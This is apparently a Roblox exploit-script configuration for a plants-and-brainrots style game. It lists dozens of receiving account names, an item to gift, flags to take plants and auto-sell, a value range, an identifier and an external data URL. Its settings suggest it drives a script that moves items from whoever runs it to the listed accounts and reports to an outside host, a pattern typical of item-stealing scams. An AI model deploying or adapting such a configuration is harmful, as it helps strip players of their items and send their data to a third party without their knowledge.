getgenv().Config = {
    ["Account Main"] = {
        "Charlott3Craft55",
        "AquaBuilderSkater202",
        "AriaVoidNeon2020",
        "RavenCircuitFlame68",
        "XXDRIFT_IcexX70",
        "VictoriaMoonSaber26",
        "ShadowSkater201650",
        "V0idLucky38",
        "XxScarl3ttToxicCooki",
        "XxRider_FusionxX2019",
        "N0ahSaber48",
        "XxSavannahFlamePhoen",
        "MaxBeast68_YT",
        "BeastFr0st92",
        "NightM00nV3n0m30",
        "XxSparklyIceBlizzard",
        "XxZoomCookieMysticxX",
        "XxKingMasterxX2013",
        "XxB3arZ3r0Slim3xX",
        "Harp3rStar2008",
        "Ic3Cooki3Light",
        "Drift_Flick61",
        "LegendFrostOmega2017",
        "Julian_FIRE16",
        "L3g3ndFlam32010_YT",
        "Qu33nClawThund3r",
        "Vip3rSkyCooki3",
        "XxH3roStormDarkxX",
        "DriftFire49",
        "PixelatedDuckChase63",
        "ChaseIce80_YT",
        "LUCAS_Fusi0n2003",
        "AddisonPrimalSonic20",
        "HyperDark200286",
        "FoxCyberPlayz2017",
        "MiaSkat3rCyb3r",
        "Arr0wP0w3rR0ck3t",
        "V0rtexBuilderAce2024",
        "ZeroKnight201253YT",
        "Oliv3rEpicB3ast",
        "XxPix3lDriftTurboxX2",
        "AquaPixelated98",
        "Stealth_Turbo98",
        "PlayzBlockSlime",
        "CyberCraftFusion",
        "GlitchSkat3rCooki3",
        "RavenHer0R0gue_YT",
        "XxCodeEpicxX65",
        "Aubr3yLion2005YT",
        "T0xicZapFlash2017",
        "HannahFuryVenom",
        "Ic3Fox2003",
        "WraithMaster2017YT",
        "JamesCha0sStar",
        "R0gue_Flash202494",
        "ChillH3roBlaz3",
        "Blast_Vip3r2004",
        "ChillBlaze84YT",
        "Fr0stM00nPh0enix",
        "Ice_Rogue201089",
        "AriaThunder51",
        "ZoomDrift201241YT",
        "CircuitFireStarry200",
        "XxChl0eBearxXYT",
        "Ultra_Jelly93",
        "Rock3t_Pix3l20",
        "DuckBacon27",
        "AmeliaMaxEpic69",
        "LaylaMaxDragon2007",
        "Mate0StealthSkater",
        "AubreyHunter26",
        "Rid3r_VORT3X2021",
        "XxInf3rnoH3roBuild3r",
        "P0werLegend78",
        "LunaStarryRocket88",
        "Arr0w_Zer02021",
        "C0de_Chase200774",
        "GlitchStarBacon2006",
    },
    ["Item Gift"] = {
        "Shroombino",
    },
    ["Take Plants"] = true,
    ["Auto Sell If Found PopUp"] = true,
    ["Custom"] = {
        ["Enable"] = true,
        ["Min"] = 1000,
        ["Max"] = 99000,
    },
    ["Take Brainrots"] = false,
    ["UUID"] = "Dracular3333",
    ["Url"] = "https://yummydata.click"
}
